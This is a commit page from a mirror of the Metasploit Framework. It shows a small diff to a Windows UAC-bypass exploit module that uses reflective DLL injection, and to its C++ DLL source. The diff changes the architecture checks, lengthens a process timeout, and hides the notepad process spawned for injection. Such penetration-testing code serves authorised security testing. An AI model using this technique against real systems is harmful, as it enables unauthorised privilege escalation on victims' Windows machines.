infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Better arch checking

bug/bundler_fix
Meatballs 2013-09-27 09:39:29 +01:00
parent dfac7b57d2
commit c3c07b5fd7
2 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp vendored
View File

@ -72,7 +72,7 @@ void exploit()
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
{
WaitForSingleObject(shinfo.hProcess, 50);
WaitForSingleObject(shinfo.hProcess, 200);
TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
CloseHandle(shinfo.hProcess);
}

8
modules/exploits/windows/local/bypassuac_injection.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Local
has the UAC flag turned off. This module uses the Reflective DLL Injection
technique to drop only the DLL payload binary instead of three seperate
binaries in the standard technique. However, it requires the correct
architecture to be selected.
architecture to be selected, (use x64 for SYSWOW64 systems also).
},
'License' => MSF_LICENSE,
'Author' => [
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Local
# decide, x86 or x64
sysarch = sysinfo["Architecture"]
if sysarch =~ /x64/i
unless target_arch.first == 'x86_64'
unless(target_arch.first =~ /64/i) and (datastore['PAYLOAD'] =~ /64/i)
fail_with(
Exploit::Failure::BadConfig,
"x86 Target Selected for x64 System"
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
register_files_for_cleanup("#{windir}\\System32\\sysprep\\CRYPTBASE.dll")
end
else
if target_arch.first =~ /x64/i
if (target_arch.first =~ /64/i) or (datastore['PAYLOAD'] =~ /64/i)
fail_with(
Exploit::Failure::BadConfig,
"x64 Target Selected for x86 System"
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Spawning process with Windows Publisher Certificate, to inject into...")
cmd = "#{windir}\\System32\\notepad.exe"
proc = client.sys.process.execute(cmd, nil, {'Hidden' => false })
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
if proc.nil? or proc.pid.nil?
fail_with(Exploit::Failure::Unknown, "Spawning Process failed...")